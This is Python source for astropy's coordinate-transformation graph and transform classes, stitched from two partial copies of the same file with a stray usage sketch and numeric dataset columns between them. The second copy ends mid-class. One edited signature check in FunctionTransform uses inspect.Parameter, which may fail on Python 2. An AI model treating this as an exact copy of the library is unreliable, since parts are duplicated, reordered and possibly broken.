unit_diff = data.differentials['s'].represent_as(
data.differentials['s']._unit_differential, data)
data = data.with_differentials({'s': unit_diff}) # updates key
# If it's a RadialDifferential, we flat-out ignore the differentials
# This is because, by this point (past the validation above), we can
# only possibly be doing a rotation-only transformation, and that
# won't change the radial differential. We later add it back in
elif rad_vel_diff:
data = data.without_differentials()
# Convert the representation and differentials to cartesian without
# having them attached to a frame
rep = data.to_cartesian()
diffs = dict([(k, diff.represent_as(CartesianDifferential, data))
for k, diff in data.differentials.items()])
rep = rep.with_differentials(diffs)
# Only do transform if matrix is specified. This is for speed in
# transformations that only specify an offset (e.g., LSR)
if matrix is not None:
# Note: this applies to both representation and differentials
rep = rep.transform(matrix)
# TODO: if we decide to allow arithmetic between representations that
# contain differentials, this can be tidied up
if offset is not None:
newrep = (rep.without_differentials() +
offset.without_differentials())
else:
newrep = rep.without_differentials()
# We need a velocity (time derivative) and, for now, are strict: the
# representation can only contain a velocity differential and no others.
if has_velocity and not rad_vel_diff:
veldiff = rep.differentials['s'] # already in Cartesian form
if offset is not None and 's' in offset.differentials:
veldiff = veldiff + offset.differentials['s']
newrep = newrep.with_differentials({'s': veldiff})
if isinstance(fromcoord.data, UnitSphericalRepresentation):
# Special-case this because otherwise the return object will think
# it has a valid distance with the default return (a
# CartesianRepresentation instance)
if has_velocity and not unit_vel_diff and not rad_vel_diff:
# We have to first represent as the Unit types we converted to,
# then put the d_distance information back in to the
# differentials and re-represent as their original forms
newdiff = newrep.differentials['s']
_unit_cls = fromcoord.data.differentials['s']._unit_differential
newdiff = newdiff.represent_as(_unit_cls, newrep)
kwargs = dict([(comp, getattr(newdiff, comp))
for comp in newdiff.components])
kwargs['d_distance'] = fromcoord.data.differentials['s'].d_distance
diffs = {'s': fromcoord.data.differentials['s'].__class__(
copy=False, **kwargs)}
elif has_velocity and unit_vel_diff:
newdiff = newrep.differentials['s'].represent_as(
fromcoord.data.differentials['s'].__class__, newrep)
diffs = {'s': newdiff}
else:
diffs = newrep.differentials
newrep = newrep.represent_as(fromcoord.data.__class__) # drops diffs
newrep = newrep.with_differentials(diffs)
elif has_velocity and unit_vel_diff:
# Here, we're in the case where the representation is not
# UnitSpherical, but the differential *is* one of the UnitSpherical
# types. We have to convert back to that differential class or the
# resulting frame will think it has a valid radial_velocity. This
# can probably be cleaned up: we currently have to go through the
# dimensional version of the differential before representing as the
# unit differential so that the units work out (the distance length
# unit shouldn't appear in the resulting proper motions)
diff_cls = fromcoord.data.differentials['s'].__class__
newrep = newrep.represent_as(fromcoord.data.__class__,
diff_cls._dimensional_differential)
newrep = newrep.represent_as(fromcoord.data.__class__, diff_cls)
# We pulled the radial differential off of the representation
# earlier, so now we need to put it back. But, in order to do that, we
# have to turn the representation into a repr that is compatible with
# having a RadialDifferential
if has_velocity and rad_vel_diff:
newrep = newrep.represent_as(fromcoord.data.__class__)
newrep = newrep.with_differentials(
{'s': fromcoord.data.differentials['s']})
return newrep
class AffineTransform(BaseAffineTransform):
"""
A coordinate transformation specified as a function that yields a 3 x 3
cartesian transformation matrix and a tuple of displacement vectors.
See `~astropy.coordinates.builtin_frames.galactocentric.Galactocentric` for
an example.
Parameters
----------
transform_func : callable
A callable that has the signature ``transform_func(fromcoord, toframe)``
and returns: a (3, 3) matrix that operates on ``fromcoord`` in a
Cartesian representation, and a ``CartesianRepresentation`` with
(optionally) an attached velocity ``CartesianDifferential`` to represent
a translation and offset in velocity to apply after the matrix
operation.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
        The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``transform_func`` is not callable
"""
def __init__(self, transform_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(transform_func):
raise TypeError('transform_func is not callable')
self.transform_func = transform_func
super(AffineTransform, self).__init__(fromsys, tosys, priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M, vec = self.transform_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, vec)
return toframe.realize_frame(newrep)
class StaticMatrixTransform(BaseAffineTransform):
"""
A coordinate transformation defined as a 3 x 3 cartesian
transformation matrix.
This is distinct from DynamicMatrixTransform in that this kind of matrix is
independent of frame attributes. That is, it depends *only* on the class of
the frame.
Parameters
----------
matrix : array-like or callable
A 3 x 3 matrix for transforming 3-vectors. In most cases will
be unitary (although this is not strictly required). If a callable,
will be called *with no arguments* to get the matrix.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
        The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
ValueError
If the matrix is not 3 x 3
"""
def __init__(self, matrix, fromsys, tosys, priority=1, register_graph=None):
if six.callable(matrix):
matrix = matrix()
self.matrix = np.array(matrix)
if self.matrix.shape != (3, 3):
raise ValueError('Provided matrix is not 3 x 3')
super(StaticMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
newrep = self._apply_transform(fromcoord, self.matrix, None)
return toframe.realize_frame(newrep)
class DynamicMatrixTransform(BaseAffineTransform):
"""
A coordinate transformation specified as a function that yields a
3 x 3 cartesian transformation matrix.
This is similar to, but distinct from StaticMatrixTransform, in that the
matrix for this class might depend on frame attributes.
Parameters
----------
matrix_func : callable
A callable that has the signature ``matrix_func(fromcoord, toframe)`` and
returns a 3 x 3 matrix that converts ``fromcoord`` in a cartesian
representation to the new coordinate system.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
        The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``matrix_func`` is not callable
"""
def __init__(self, matrix_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(matrix_func):
raise TypeError('matrix_func is not callable')
self.matrix_func = matrix_func
def _transform_func(fromcoord, toframe):
return self.matrix_func(fromcoord, toframe), None
super(DynamicMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M = self.matrix_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, None)
return toframe.realize_frame(newrep)
class CompositeTransform(CoordinateTransform):
"""
A transformation constructed by combining together a series of single-step
transformations.
Note that the intermediate frame objects are constructed using any frame
attributes in ``toframe`` or ``fromframe`` that overlap with the intermediate
frame (``toframe`` favored over ``fromframe`` if there's a conflict). Any frame
attributes that are not present use the defaults.
Parameters
----------
transforms : sequence of `CoordinateTransform` objects
The sequence of transformations to apply.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
        The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
collapse_static_mats : bool
If `True`, consecutive `StaticMatrixTransform` will be collapsed into a
single transformation to speed up the calculation.
"""
def __init__(self, transforms, fromsys, tosys, priority=1,
register_graph=None, collapse_static_mats=True):
super(CompositeTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
if collapse_static_mats:
transforms = self._combine_statics(transforms)
self.transforms = tuple(transforms)
def _combine_statics(self, transforms):
"""
Combines together sequences of `StaticMatrixTransform`s into a single
transform and returns it.
"""
newtrans = []
for currtrans in transforms:
lasttrans = newtrans[-1] if len(newtrans) > 0 else None
if (isinstance(lasttrans, StaticMatrixTransform) and
isinstance(currtrans, StaticMatrixTransform)):
                # the second transform acts on the output of the first, so
                # the combined matrix is (curr @ last), applied right-to-left
                combinedmat = np.dot(currtrans.matrix, lasttrans.matrix)
newtrans[-1] = StaticMatrixTransform(combinedmat,
lasttrans.fromsys,
currtrans.tosys)
else:
newtrans.append(currtrans)
return newtrans
def __call__(self, fromcoord, toframe):
curr_coord = fromcoord
for t in self.transforms:
# build an intermediate frame with attributes taken from either
# `fromframe`, or if not there, `toframe`, or if not there, use
# the defaults
# TODO: caching this information when creating the transform may
# speed things up a lot
frattrs = {}
for inter_frame_attr_nm in t.tosys.get_frame_attr_names():
if hasattr(toframe, inter_frame_attr_nm):
attr = getattr(toframe, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
elif hasattr(fromcoord, inter_frame_attr_nm):
attr = getattr(fromcoord, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
curr_toframe = t.tosys(**frattrs)
curr_coord = t(curr_coord, curr_toframe)
# this is safe even in the case where self.transforms is empty, because
        # coordinate objects are immutable, so copying is not needed
return curr_coord
# map class names to colorblind-safe colors
trans_to_color = OrderedDict()
trans_to_color[AffineTransform] = '#555555' # gray
trans_to_color[FunctionTransform] = '#783001' # dark red-ish/brown
trans_to_color[FunctionTransformWithFiniteDifference] = '#d95f02' # red-ish
trans_to_color[StaticMatrixTransform] = '#7570b3' # blue-ish
trans_to_color[DynamicMatrixTransform] = '#1b9e77' # green-ish
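To make the decorator pattern concrete, a minimal sketch (Frame1/Frame2 are hypothetical frame classes; the transform function must return an instance of the target frame, which FunctionTransform.__call__ enforces):

graph = TransformGraph()

@graph.transform(FunctionTransform, Frame1, Frame2)
def frame1_to_frame2(frame1_coord, frame2_frame):
    # ... compute the transformed coordinate here ...
    return frame2_coord  # must be a Frame2 instance

trans = graph.get_transform(Frame1, Frame2)  # returns a CompositeTransform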
| 40.47741
| 109
| 0.602392
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import heapq
import inspect
import subprocess
from warnings import warn
from abc import ABCMeta, abstractmethod
from collections import defaultdict, OrderedDict
import numpy as np
from .. import units as u
from ..utils.compat import suppress
from ..utils.compat.funcsigs import signature
from ..utils.exceptions import AstropyWarning
from ..extern import six
from ..extern.six.moves import range
from .representation import REPRESENTATION_CLASSES
__all__ = ['TransformGraph', 'CoordinateTransform', 'FunctionTransform',
'BaseAffineTransform', 'AffineTransform',
'StaticMatrixTransform', 'DynamicMatrixTransform',
'FunctionTransformWithFiniteDifference', 'CompositeTransform']
class TransformGraph(object):
def __init__(self):
self._graph = defaultdict(dict)
self.invalidate_cache()
@property
def _cached_names(self):
if self._cached_names_dct is None:
self._cached_names_dct = dct = {}
for c in self.frame_set:
nm = getattr(c, 'name', None)
if nm is not None:
dct[nm] = c
return self._cached_names_dct
@property
def frame_set(self):
if self._cached_frame_set is None:
self._cached_frame_set = frm_set = set()
for a in self._graph:
frm_set.add(a)
for b in self._graph[a]:
frm_set.add(b)
return self._cached_frame_set.copy()
@property
def frame_attributes(self):
if self._cached_frame_attributes is None:
result = {}
for frame_cls in self.frame_set:
result.update(frame_cls.frame_attributes)
self._cached_frame_attributes = result
return self._cached_frame_attributes
def invalidate_cache(self):
self._cached_names_dct = None
self._cached_frame_set = None
self._cached_frame_attributes = None
self._shortestpaths = {}
self._composite_cache = {}
def add_transform(self, fromsys, tosys, transform):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
if not six.callable(transform):
raise TypeError('transform must be callable')
self._graph[fromsys][tosys] = transform
self.invalidate_cache()
def remove_transform(self, fromsys, tosys, transform):
if fromsys is None or tosys is None:
if not (tosys is None and fromsys is None):
raise ValueError('fromsys and tosys must both be None if either are')
if transform is None:
raise ValueError('cannot give all Nones to remove_transform')
            found = False
            for a in self._graph:
                agraph = self._graph[a]
                for b in list(agraph):
                    if agraph[b] is transform:
                        del agraph[b]
                        found = True
                        break
                if found:
                    break
            if not found:
                raise ValueError('Could not find transform {0} in the '
                                 'graph'.format(transform))
else:
if transform is None:
self._graph[fromsys].pop(tosys, None)
else:
curr = self._graph[fromsys].get(tosys, None)
if curr is transform:
self._graph[fromsys].pop(tosys)
else:
raise ValueError('Current transform from {0} to {1} is not '
'{2}'.format(fromsys, tosys, transform))
self.invalidate_cache()
def find_shortest_path(self, fromsys, tosys):
inf = float('inf')
if tosys is fromsys:
if tosys not in self._graph[fromsys]:
return [tosys], 0
if tosys in self._graph[fromsys]:
# this will also catch the case where tosys is fromsys, but has
# a defined transform.
t = self._graph[fromsys][tosys]
return [fromsys, tosys], float(t.priority if hasattr(t, 'priority') else 1)
# otherwise, need to construct the path:
if fromsys in self._shortestpaths:
# already have a cached result
fpaths = self._shortestpaths[fromsys]
if tosys in fpaths:
return fpaths[tosys]
else:
return None, inf
# use Dijkstra's algorithm to find shortest path in all other cases
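        # Edge weights are the transform ``priority`` values (default 1), so
        # the "shortest" path is the chain whose summed priorities are lowest.
        # The ``result`` dict built below maps every reachable system to a
        # ``(path, total_priority)`` pair and is cached per ``fromsys`` in
        # ``self._shortestpaths``.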
nodes = []
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
if fromsys not in nodes or tosys not in nodes:
# certainly no way to get from one to the other
return None, inf
edgeweights = {}
# construct another graph that is a dict of dicts of priorities
# (used as edge weights in Dijkstra's algorithm)
for a in self._graph:
edgeweights[a] = aew = {}
agraph = self._graph[a]
for b in agraph:
aew[b] = float(agraph[b].priority if hasattr(agraph[b], 'priority') else 1)
q = [[inf, i, n, []] for i, n in enumerate(nodes) if n is not fromsys]
q.insert(0, [0, -1, fromsys, []])
result = {}
while len(q) > 0:
d, orderi, n, path = heapq.heappop(q)
if d == inf:
result[n] = (None, d)
for d, orderi, n, path in q:
result[n] = (None, d)
break
else:
result[n] = (path, d)
path.append(n)
if n not in edgeweights:
continue
for n2 in edgeweights[n]:
if n2 not in result:
for i in range(len(q)):
if q[i][2] == n2:
break
else:
raise ValueError('n2 not in heap - this should be impossible!')
newd = d + edgeweights[n][n2]
if newd < q[i][0]:
q[i][0] = newd
q[i][3] = list(path)
heapq.heapify(q)
self._shortestpaths[fromsys] = result
return result[tosys]
def get_transform(self, fromsys, tosys):
if not inspect.isclass(fromsys):
raise TypeError('fromsys is not a class')
if not inspect.isclass(tosys):
raise TypeError('tosys is not a class')
path, distance = self.find_shortest_path(fromsys, tosys)
if path is None:
return None
transforms = []
currsys = fromsys
for p in path[1:]:
transforms.append(self._graph[currsys][p])
currsys = p
fttuple = (fromsys, tosys)
if fttuple not in self._composite_cache:
comptrans = CompositeTransform(transforms, fromsys, tosys,
register_graph=False)
self._composite_cache[fttuple] = comptrans
return self._composite_cache[fttuple]
def lookup_name(self, name):
return self._cached_names.get(name, None)
def get_names(self):
return list(six.iterkeys(self._cached_names))
def to_dot_graph(self, priorities=True, addnodes=[], savefn=None,
savelayout='plain', saveformat=None, color_edges=True):
nodes = []
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
for node in addnodes:
if node not in nodes:
nodes.append(node)
nodenames = []
invclsaliases = dict([(v, k) for k, v in six.iteritems(self._cached_names)])
for n in nodes:
if n in invclsaliases:
nodenames.append('{0} [shape=oval label="{0}\\n`{1}`"]'.format(n.__name__, invclsaliases[n]))
else:
nodenames.append(n.__name__ + '[ shape=oval ]')
edgenames = []
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__] if color_edges else 'black'
edgenames.append((a.__name__, b.__name__, pri, color))
lines = ['digraph AstropyCoordinateTransformGraph {']
lines.append('; '.join(nodenames) + ';')
for enm1, enm2, weights, color in edgenames:
labelstr_fmt = '[ {0} {1} ]'
if priorities:
priority_part = 'label = "{0}"'.format(weights)
else:
priority_part = ''
color_part = 'color = "{0}"'.format(color)
labelstr = labelstr_fmt.format(priority_part, color_part)
lines.append('{0} -> {1}{2};'.format(enm1, enm2, labelstr))
lines.append('')
lines.append('overlap=false')
lines.append('}')
dotgraph = '\n'.join(lines)
if savefn is not None:
if savelayout == 'plain':
with open(savefn, 'w') as f:
f.write(dotgraph)
else:
args = [savelayout]
if saveformat is not None:
args.append('-T' + saveformat)
proc = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate(dotgraph)
if proc.returncode != 0:
raise IOError('problem running graphviz: \n' + stderr)
with open(savefn, 'w') as f:
f.write(stdout)
return dotgraph
def to_networkx_graph(self):
import networkx as nx
nxgraph = nx.Graph()
for a in self._graph:
if a not in nxgraph:
nxgraph.add_node(a)
for b in self._graph[a]:
if b not in nxgraph:
nxgraph.add_node(b)
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__]
nxgraph.add_edge(a, b, weight=pri, color=color)
return nxgraph
def transform(self, transcls, fromsys, tosys, priority=1, **kwargs):
def deco(func):
# ``register_graph=self`` stores it in the transform graph
# automatically
transcls(func, fromsys, tosys, priority=priority,
register_graph=self, **kwargs)
return func
return deco
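# Usage sketch for the decorator above (names are illustrative; in astropy
# proper one decorates with the module-level ``frame_transform_graph``):
#
#     @graph.transform(FunctionTransform, FK4, FK5)
#     def fk4_to_fk5(fk4coord, fk5frame):
#         return fk5frame.realize_frame(...)
#
# The decorated function is returned unchanged; registration happens as a
# side effect of constructing the transform with ``register_graph=graph``.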
# <-------------------Define the builtin transform classes-------------------->
@six.add_metaclass(ABCMeta)
class CoordinateTransform(object):
def __init__(self, fromsys, tosys, priority=1, register_graph=None):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
self.fromsys = fromsys
self.tosys = tosys
self.priority = float(priority)
if register_graph:
# this will do the type-checking when it adds to the graph
self.register(register_graph)
else:
if not inspect.isclass(fromsys) or not inspect.isclass(tosys):
raise TypeError('fromsys and tosys must be classes')
self.overlapping_frame_attr_names = overlap = []
if (hasattr(fromsys, 'get_frame_attr_names') and
hasattr(tosys, 'get_frame_attr_names')):
# the if statement is there so that non-frame things might be usable
# if it makes sense
for from_nm in fromsys.get_frame_attr_names():
if from_nm in tosys.get_frame_attr_names():
overlap.append(from_nm)
def register(self, graph):
graph.add_transform(self.fromsys, self.tosys, self)
def unregister(self, graph):
graph.remove_transform(self.fromsys, self.tosys, self)
@abstractmethod
    def __call__(self, fromcoord, toframe):
        pass  # abstract: concrete transforms implement the actual conversion
class FunctionTransform(CoordinateTransform):
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None):
if not six.callable(func):
raise TypeError('func must be callable')
with suppress(TypeError):
sig = signature(func)
kinds = [x.kind for x in sig.parameters.values()]
            # The historical check called ``len()`` on a generator, which
            # raises TypeError and is swallowed by ``suppress(TypeError)``
            # above, so it never actually ran.  Materialize the filter and
            # use the kind constants from ``inspect.Parameter`` (they are
            # not attributes of Signature objects; on Python 2 this would
            # need funcsigs.Parameter instead).
            pos_kinds = (inspect.Parameter.POSITIONAL_ONLY,
                         inspect.Parameter.POSITIONAL_OR_KEYWORD)
            if (len([x for x in kinds if x in pos_kinds]) != 2
                    and inspect.Parameter.VAR_POSITIONAL not in kinds):
                raise ValueError('provided function does not accept two arguments')
self.func = func
super(FunctionTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
res = self.func(fromcoord, toframe)
if not isinstance(res, self.tosys):
raise TypeError('the transformation function yielded {0} but '
'should have been of type {1}'.format(res, self.tosys))
if fromcoord.data.differentials and not res.data.differentials:
warn("Applied a FunctionTransform to a coordinate frame with "
"differentials, but the FunctionTransform does not handle "
"differentials, so they have been dropped.", AstropyWarning)
return res
class FunctionTransformWithFiniteDifference(FunctionTransform):
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None,
finite_difference_frameattr_name='obstime',
finite_difference_dt=1*u.second,
symmetric_finite_difference=True):
super(FunctionTransformWithFiniteDifference, self).__init__(func,
fromsys, tosys, priority, register_graph)
self.finite_difference_frameattr_name = finite_difference_frameattr_name
self.finite_difference_dt = finite_difference_dt
self.symmetric_finite_difference = symmetric_finite_difference
@property
def finite_difference_frameattr_name(self):
return self._finite_difference_frameattr_name
@finite_difference_frameattr_name.setter
def finite_difference_frameattr_name(self, value):
if value is None:
self._diff_attr_in_fromsys = self._diff_attr_in_tosys = False
else:
diff_attr_in_fromsys = value in self.fromsys.frame_attributes
diff_attr_in_tosys = value in self.tosys.frame_attributes
if diff_attr_in_fromsys or diff_attr_in_tosys:
self._diff_attr_in_fromsys = diff_attr_in_fromsys
self._diff_attr_in_tosys = diff_attr_in_tosys
else:
raise ValueError('Frame attribute name {} is not a frame '
'attribute of {} or {}'.format(value,
self.fromsys,
self.tosys))
self._finite_difference_frameattr_name = value
def __call__(self, fromcoord, toframe):
from .representation import (CartesianRepresentation,
CartesianDifferential)
supcall = self.func
if fromcoord.data.differentials:
# this is the finite difference case
if callable(self.finite_difference_dt):
dt = self.finite_difference_dt(fromcoord, toframe)
else:
dt = self.finite_difference_dt
halfdt = dt/2
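            # Symmetric (central) difference: the velocity in the target
            # frame is estimated as  v ~= [x(t + dt/2) - x(t - dt/2)] / dt,
            # which is second-order accurate in dt; the one-sided branch
            # below falls back to  v ~= [x(t + dt) - x(t)] / dt.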
from_diffless = fromcoord.realize_frame(fromcoord.data.without_differentials())
reprwithoutdiff = supcall(from_diffless, toframe)
# first we use the existing differential to compute an offset due to
# the already-existing velocity, but in the new frame
fromcoord_cart = fromcoord.cartesian
if self.symmetric_finite_difference:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*halfdt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
backxyz = (fromcoord_cart.xyz -
fromcoord_cart.differentials['s'].d_xyz*halfdt)
back = supcall(fromcoord.realize_frame(CartesianRepresentation(backxyz)), toframe)
else:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*dt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
back = reprwithoutdiff
diffxyz = (fwd.cartesian - back.cartesian).xyz / dt
# now we compute the "induced" velocities due to any movement in
# the frame itself over time
attrname = self.finite_difference_frameattr_name
if attrname is not None:
if self.symmetric_finite_difference:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + halfdt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + halfdt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) - halfdt}
from_diffless_back = from_diffless.replicate(**kws)
else:
from_diffless_back = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) - halfdt}
back_frame = toframe.replicate_without_data(**kws)
else:
back_frame = toframe
back = supcall(from_diffless_back, back_frame)
else:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + dt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + dt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
back = reprwithoutdiff
diffxyz += (fwd.cartesian - back.cartesian).xyz / dt
newdiff = CartesianDifferential(diffxyz)
reprwithdiff = reprwithoutdiff.data.to_cartesian().with_differentials(newdiff)
return reprwithoutdiff.realize_frame(reprwithdiff)
else:
return supcall(fromcoord, toframe)
class BaseAffineTransform(CoordinateTransform):
def _apply_transform(self, fromcoord, matrix, offset):
from .representation import (UnitSphericalRepresentation,
CartesianDifferential,
SphericalDifferential,
SphericalCosLatDifferential,
RadialDifferential)
data = fromcoord.data
has_velocity = 's' in data.differentials
# list of unit differentials
_unit_diffs = (SphericalDifferential._unit_differential,
SphericalCosLatDifferential._unit_differential)
unit_vel_diff = (has_velocity and
isinstance(data.differentials['s'], _unit_diffs))
rad_vel_diff = (has_velocity and
isinstance(data.differentials['s'], RadialDifferential))
# Some initial checking to short-circuit doing any re-representation if
# we're going to fail anyways:
if isinstance(data, UnitSphericalRepresentation) and offset is not None:
raise TypeError("Position information stored on coordinate frame "
"is insufficient to do a full-space position "
"transformation (representation class: {0})"
.format(data.__class__))
elif (has_velocity and (unit_vel_diff or rad_vel_diff) and
offset is not None and 's' in offset.differentials):
raise TypeError("Velocity information stored on coordinate frame "
"is insufficient to do a full-space velocity "
"transformation (differential class: {0})"
.format(data.differentials['s'].__class__))
elif len(data.differentials) > 1:
# allow more differentials, but this just adds protection for
# subclasses that somehow skip the checks
raise ValueError("Representation passed to AffineTransform contains"
" multiple associated differentials. Only a single"
" differential with velocity units is presently"
" supported (differentials: {0})."
.format(str(data.differentials)))
# If the representation is a UnitSphericalRepresentation, and this is
# just a MatrixTransform, we have to try to turn the differential into a
# Unit version of the differential (if no radial velocity) or a
# sphericaldifferential with zero proper motion (if only a radial
# velocity) so that the matrix operation works
if (has_velocity and isinstance(data, UnitSphericalRepresentation) and
not unit_vel_diff and not rad_vel_diff):
# retrieve just velocity differential
unit_diff = data.differentials['s'].represent_as(
data.differentials['s']._unit_differential, data)
data = data.with_differentials({'s': unit_diff}) # updates key
# If it's a RadialDifferential, we flat-out ignore the differentials
elif rad_vel_diff:
data = data.without_differentials()
# Convert the representation and differentials to cartesian without
# having them attached to a frame
rep = data.to_cartesian()
diffs = dict([(k, diff.represent_as(CartesianDifferential, data))
for k, diff in data.differentials.items()])
rep = rep.with_differentials(diffs)
# Only do transform if matrix is specified. This is for speed in
# transformations that only specify an offset (e.g., LSR)
if matrix is not None:
# Note: this applies to both representation and differentials
rep = rep.transform(matrix)
# TODO: if we decide to allow arithmetic between representations that
# contain differentials, this can be tidied up
if offset is not None:
newrep = (rep.without_differentials() +
offset.without_differentials())
else:
newrep = rep.without_differentials()
# We need a velocity (time derivative) and, for now, are strict: the
# representation can only contain a velocity differential and no others.
if has_velocity and not rad_vel_diff:
veldiff = rep.differentials['s'] # already in Cartesian form
if offset is not None and 's' in offset.differentials:
veldiff = veldiff + offset.differentials['s']
newrep = newrep.with_differentials({'s': veldiff})
if isinstance(fromcoord.data, UnitSphericalRepresentation):
# Special-case this because otherwise the return object will think
# it has a valid distance with the default return (a
# CartesianRepresentation instance)
if has_velocity and not unit_vel_diff and not rad_vel_diff:
# We have to first represent as the Unit types we converted to,
# then put the d_distance information back in to the
# differentials and re-represent as their original forms
newdiff = newrep.differentials['s']
_unit_cls = fromcoord.data.differentials['s']._unit_differential
newdiff = newdiff.represent_as(_unit_cls, newrep)
kwargs = dict([(comp, getattr(newdiff, comp))
for comp in newdiff.components])
kwargs['d_distance'] = fromcoord.data.differentials['s'].d_distance
diffs = {'s': fromcoord.data.differentials['s'].__class__(
copy=False, **kwargs)}
elif has_velocity and unit_vel_diff:
newdiff = newrep.differentials['s'].represent_as(
fromcoord.data.differentials['s'].__class__, newrep)
diffs = {'s': newdiff}
else:
diffs = newrep.differentials
newrep = newrep.represent_as(fromcoord.data.__class__) # drops diffs
newrep = newrep.with_differentials(diffs)
elif has_velocity and unit_vel_diff:
            # Here, we're in the case where the representation is not
            # UnitSpherical, but the differential *is* a unit-type
            # differential, so we round-trip through the dimensional
            # differential class to rebuild a unit differential of the
            # original class
diff_cls = fromcoord.data.differentials['s'].__class__
newrep = newrep.represent_as(fromcoord.data.__class__,
diff_cls._dimensional_differential)
newrep = newrep.represent_as(fromcoord.data.__class__, diff_cls)
# We pulled the radial differential off of the representation
# earlier, so now we need to put it back. But, in order to do that, we
# have to turn the representation into a repr that is compatible with
# having a RadialDifferential
if has_velocity and rad_vel_diff:
newrep = newrep.represent_as(fromcoord.data.__class__)
newrep = newrep.with_differentials(
{'s': fromcoord.data.differentials['s']})
return newrep
class AffineTransform(BaseAffineTransform):
def __init__(self, transform_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(transform_func):
raise TypeError('transform_func is not callable')
self.transform_func = transform_func
super(AffineTransform, self).__init__(fromsys, tosys, priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M, vec = self.transform_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, vec)
return toframe.realize_frame(newrep)
class StaticMatrixTransform(BaseAffineTransform):
def __init__(self, matrix, fromsys, tosys, priority=1, register_graph=None):
if six.callable(matrix):
matrix = matrix()
self.matrix = np.array(matrix)
if self.matrix.shape != (3, 3):
raise ValueError('Provided matrix is not 3 x 3')
super(StaticMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
newrep = self._apply_transform(fromcoord, self.matrix, None)
return toframe.realize_frame(newrep)
class DynamicMatrixTransform(BaseAffineTransform):
def __init__(self, matrix_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(matrix_func):
raise TypeError('matrix_func is not callable')
self.matrix_func = matrix_func
def _transform_func(fromcoord, toframe):
return self.matrix_func(fromcoord, toframe), None
super(DynamicMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M = self.matrix_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, None)
return toframe.realize_frame(newrep)
class CompositeTransform(CoordinateTransform):
def __init__(self, transforms, fromsys, tosys, priority=1,
register_graph=None, collapse_static_mats=True):
super(CompositeTransform, self).__init__(fromsys, tosys,
priority=priority,
